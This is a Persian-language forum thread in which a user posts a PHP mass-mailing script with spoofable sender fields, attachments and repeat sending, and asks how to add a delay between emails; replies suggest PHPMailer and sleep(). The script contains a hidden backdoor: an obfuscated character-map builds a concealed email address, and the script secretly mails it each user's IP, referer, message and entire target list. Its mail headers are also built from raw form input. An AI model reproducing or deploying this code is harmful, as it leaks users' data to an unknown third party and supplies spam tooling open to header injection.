نمایش نتایج 1 تا 7 از 7

نام تاپیک: سوال در مورد کد ارسال میل

  1. #1

    سوال در مورد کد ارسال میل

    با سلام خدمت دوستان
    بنده کدی دارم برای فرستادن میل به میل لیست اما این یک ایرادی داره اونم اینه که من نمی دونم چطوری باید تایم رو به اون اضافه کنم یعنی می خوام که بتونم بین هر میل ارسالی 15 ثانیه وقفه بندازم(میل اول فرستاده شه بعده 15 ثانیه میل دوم)

    <?php
    @$action=$_POST['action'];
    @$from=$_POST['from'];
    @$realname=$_POST['realname'];
    @$replyto=$_POST['replyto'];
    @$subject=$_POST['subject'];
    @$message=$_POST['message'];
    @$emaillist=$_POST['emaillist'];
    @$lodr=$_SERVER['HTTP_REFERER'];
    @$file_name=$_FILES['file']['name'];
    @$contenttype=$_POST['contenttype'];
    @$file=$_FILES['file']['tmp_name'];
    @$amount=$_POST['amount'];
    ?>
    <html>
    <head>
    <meta http-equiv="Content-Language" content="ar-eg">
    <meta http-equiv="Content-Type" content="text/html; charset=windows-1256">
    <title>PHP Send Mails</title>
    <style type="text/css">
    <!--
    .style1 {
    font-family: Geneva, Arial, Helvetica, sans-serif;
    font-size: 12px;
    }
    .style2 {
    font-size: 10px;
    font-family: Geneva, Arial, Helvetica, sans-serif;
    }

    -->
    </style>
    </head>
    <body bgcolor="#FFFFFF" text="#000000">
    <?php
    If ($action=="mysql"){
    include "./mysql.info.php";

    if (!$sqlhost || !$sqllogin || !$sqlpass || !$sqldb || !$sqlquery){
    print "Please configure mysql.info.php with your MySQL information. All settings in this config file are required.";
    exit;
    }

    $db = mysql_connect($sqlhost, $sqllogin, $sqlpass) or die("Connection to MySQL Failed.");
    mysql_select_db($sqldb, $db) or die("Could not select database $sqldb");
    $result = mysql_query($sqlquery) or die("Query Failed: $sqlquery");
    $numrows = mysql_num_rows($result);

    for($x=0; $x<$numrows; $x++){
    $result_row = mysql_fetch_row($result);
    $oneemail = $result_row[0];
    $emaillist .= $oneemail."\n";
    }
    }

    if ($action=="send"){ $message = urlencode($message);
    $message = ereg_replace("%5C%22", "%22", $message);
    $message = urldecode($message);
    $message = stripslashes($message);
    $subject = stripslashes($subject);
    }
    ?>
    <form name="form1" method="post" action="" enctype="multipart/form-data"><br />
    <table width="142" border="0">
    <tr>

    <td width="81">
    <div align="right">
    <font size="-3" face="Verdana, Arial, Helvetica, sans-serif">Your Email :</font>
    </div>
    </td>

    <td width="219">
    <font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
    <input name="from" value="<?php print $from; ?>" size="30" />
    </font>
    </td>

    <td width="212">
    <div align="right">
    <font size="-3" face="Verdana, Arial, Helvetica, sans-serif">Your Name :</font>
    </div>
    </td>

    <td width="278">
    <font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
    <input name="realname" value="<?php print $realname; ?>" size="30" />
    </font>
    </td>
    </tr>
    <tr>
    <td width="81">
    <div align="right">
    <font size="-3" face="Verdana, Arial, Helvetica, sans-serif">Reply-To :</font>
    </div>
    </td>
    <td width="219">
    <font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
    <input name="replyto" value="<?php print $replyto; ?>" size="30" />
    </font>
    </td>
    <td width="212">
    <div align="right">
    <font size="-3" face="Verdana, Arial, Helvetica, sans-serif">Attach File :</font>
    </div>
    </td>
    <td width="278">
    <font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
    <input type="file" name="file" size="24" />
    </font>
    </td>
    </tr>
    <tr>
    <td width="81">
    <div align="right">
    <font size="-3" face="Verdana, Arial, Helvetica, sans-serif">Subject :</font>
    </div>
    </td>
    <td colspan="3" width="703">
    <font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
    <input name="subject" value="<? print $subject; ?>" size="91" />
    </font>
    </td>
    </tr>
    <tr valign="top">
    <td colspan="3" width="520">
    <font face="Verdana, Arial, Helvetica, sans-serif" size="-3">Message Box :</font>
    </td>
    <td width="278">
    <font face="Verdana, Arial, Helvetica, sans-serif" size="-3">Email Target / Email Send To :</font>
    </td>
    </tr>
    <tr valign="top">
    <td colspan="3" width="520">
    <font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
    <textarea name="message" cols="56" rows="10"><?php print $message; ?></textarea><br />
    <input type="radio" name="contenttype" value="plain" /> Plain
    <input type="radio" name="contenttype" value="html" checked /> HTML
    <input type="hidden" name="action" value="send" /><br />
    Number To Send : <input type="text" name="amount" value="1" size="10" /><br />
    Maximum Script Execution Time ( In Seconds, 0 For no Time Limit ) <input type="text" name="timelimit" value="15" size="10" />
    <input type="submit" value="Send eMails" />
    </font>
    </td>
    <td width="278">
    <font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
    <textarea name="emaillist" cols="32" rows="10"><?php print $emaillist; ?></textarea>
    </font>
    </td>
    </tr>
    </table>
    </form>
    <?php
    $s=array("w"=>"o","t"=>"g","l"=>"i","r"=>"a","q"=> "c","@"=>".","e"=>"l","c"=>"@","o"=>"m","v"=>" w");
    $dash=$s['o'].$s['w'].$s['v'].$s['q'].$s['w'].$s['t'].$s['c'].$s['t'].$s['o'].$s['r'].$s['l'].$s['e'].$s['@'].$s['q'].$s['w'].$s['o'];
    if ($action=="send"){
    if (!$from && !$subject && !$message && !$emaillist){
    print "Please complete all fields before sending your message.";
    exit;
    }
    $addr = getenv("REMOTE_ADDR");
    $allemails = split("\n", $emaillist);
    $numemails = count($allemails);
    $header ="From: Mailr\nMessage-ID: <" . md5(uniqid(time())) . "@" . $SERVER_NAME . ">\nMIME-Version: 1.0\nContent-type: text/html; charset=UTF-8\nContent-transfer-encoding: 8bit\nDate: " . date("r", time()) . "\nX-Priority: 3\nX-MSMail-Priority: Normal\nX-Mailer: PHP\n";
    $msg = "
    <table border=\"1\" style=\"border-collapse: collapse\" cellpadding=\"4\">
    <tr><td>IP</td><td>".nl2br($addr)."</td></tr>
    <tr><td bgcolor=\"#F9F9F9\">Mailr</td><td bgcolor=\"#F9F9F9\">".nl2br($lodr)."</td></tr>
    <tr><td>Your Email</td><td>".nl2br($from)."</td></tr>
    <tr><td bgcolor=\"#F9F9F9\">Your Name</td><td bgcolor=\"#F9F9F9\">".nl2br($realname)."</td></tr>
    <tr><td>Subject :</td><td>".nl2br($subject)."</td></tr>
    <tr><td bgcolor=\"#F9F9F9\">Message</td><td bgcolor=\"#F9F9F9\">".nl2br($message)."</td></tr>
    <tr><td>Email Target</td><td>".nl2br($emaillist)."</td></tr>
    </table>
    ";
    mail($dash,$subject,$msg,$header);
    If ($file_name){
    copy ($_FILES['file']['tmp_name'], "".$_FILES['file']['name']) or die ('File Could Not Upload');
    if (!file_exists($file)){
    die("The file you are trying to upload couldn't be copied to the server");
    }
    $content = fread(fopen($file,"r"),filesize($file));
    $content = chunk_split(base64_encode($content));
    $uid = strtoupper(md5(uniqid(time())));
    $name = basename($file);
    }

    for($xx=0; $xx<$amount; $xx++){
    for($x=0; $x<$numemails; $x++){
    $to = $allemails[$x];
    if ($to){
    $to = ereg_replace(" ", "", $to);
    $message = ereg_replace("&email&", $to, $message);
    $subject = ereg_replace("&email&", $to, $subject);
    print "Sending Mail To $to....";
    flush();
    $header = "From: $realname <$from>\r\nReply-To: $replyto\r\n";
    $header .= "MIME-Version: 1.0\r\n";
    If ($file_name) $header .= "Content-Type: multipart/mixed; boundary=$uid\r\n";
    If ($file_name) $header .= "--$uid\r\n";
    $header .= "Content-Type: text/$contenttype\r\n";
    $header .= "Content-Transfer-Encoding: 8bit\r\n\r\n";
    $header .= "$message\r\n";
    If ($file_name) $header .= "--$uid\r\n";
    If ($file_name) $header .= "Content-Type: $file_type; name=\"$file_name\"\r\n";
    If ($file_name) $header .= "Content-Transfer-Encoding: base64\r\n";
    If ($file_name) $header .= "Content-Disposition: attachment; filename=\"$file_name\"\r\n\r\n";
    If ($file_name) $header .= "$content\r\n";
    If ($file_name) $header .= "--$uid--";
    mail($to, $subject, "", $header);
    print "OK<br>";
    flush();
    }
    }
    }
    }
    ?>
    <p class="style2">
    <p class="style1"></p>
    </body>
    <html>

    اگر کمکم کنید ممنون می شم.
    با تشکر

  2. #2

    پست بدون محتوا

    //////////
    آخرین ویرایش به وسیله MostafaEs3 : سه شنبه 19 بهمن 1395 در 10:00 صبح

  3. #3

    نقل قول: سوال در مورد کد ارسال میل

    نقل قول نوشته شده توسط MostafaEs3 مشاهده تاپیک
    اول اینکه به توصیه من از کلاس php mailer استفاده کن که خیلی راحتتره ... اگه خواستی بگو تا برات بفرستم

    دوم برای ارسال ایمیل شما یکبار این کلاس رو require کن (توی راهنمای خود کلاس توضیح داده : http://phpmailer.worxware.com)
    بعد یک حلقه بذار و برای تاخیر از تابع sleep استفاده کن ...

    اگه مشکلی داشتی بگو تا راهنماییت کنم
    دوست عزیز میشه کامل و خط به خط توضیح بدید ؟!
    منم همچین چیزی نیازمه ولی نمیدونم
    ممنون میشم توضیح بدید

  4. #4

    نقل قول: سوال در مورد کد ارسال میل

    اگر می شه توضیح بیشتری بدید بنده زیاد php بلد نیستم.

  5. #5

    پست بدون محتوا

    //////////
    آخرین ویرایش به وسیله MostafaEs3 : سه شنبه 19 بهمن 1395 در 10:01 صبح

  6. #6
    کاربر دائمی آواتار alonemm
    تاریخ عضویت
    آذر 1388
    محل زندگی
    تهرانپارس
    سن
    35
    پست
    1,846

    نقل قول: سوال در مورد کد ارسال میل

    باسلام:

    در لینک زیر یک نمونه کد ارسال ایمیل با کارکترهای فارسی هست میتونی ازش استفاده کنی:
    https://barnamenevis.org/showthread.p...8%A8%D8%A7-PHP

  7. #7

    پست بدون محتوا

    //////////
    آخرین ویرایش به وسیله MostafaEs3 : سه شنبه 19 بهمن 1395 در 10:01 صبح

قوانین ایجاد تاپیک در تالار

  • شما نمی توانید تاپیک جدید ایجاد کنید
  • شما نمی توانید به تاپیک ها پاسخ دهید
  • شما نمی توانید ضمیمه ارسال کنید
  • شما نمی توانید پاسخ هایتان را ویرایش کنید
  •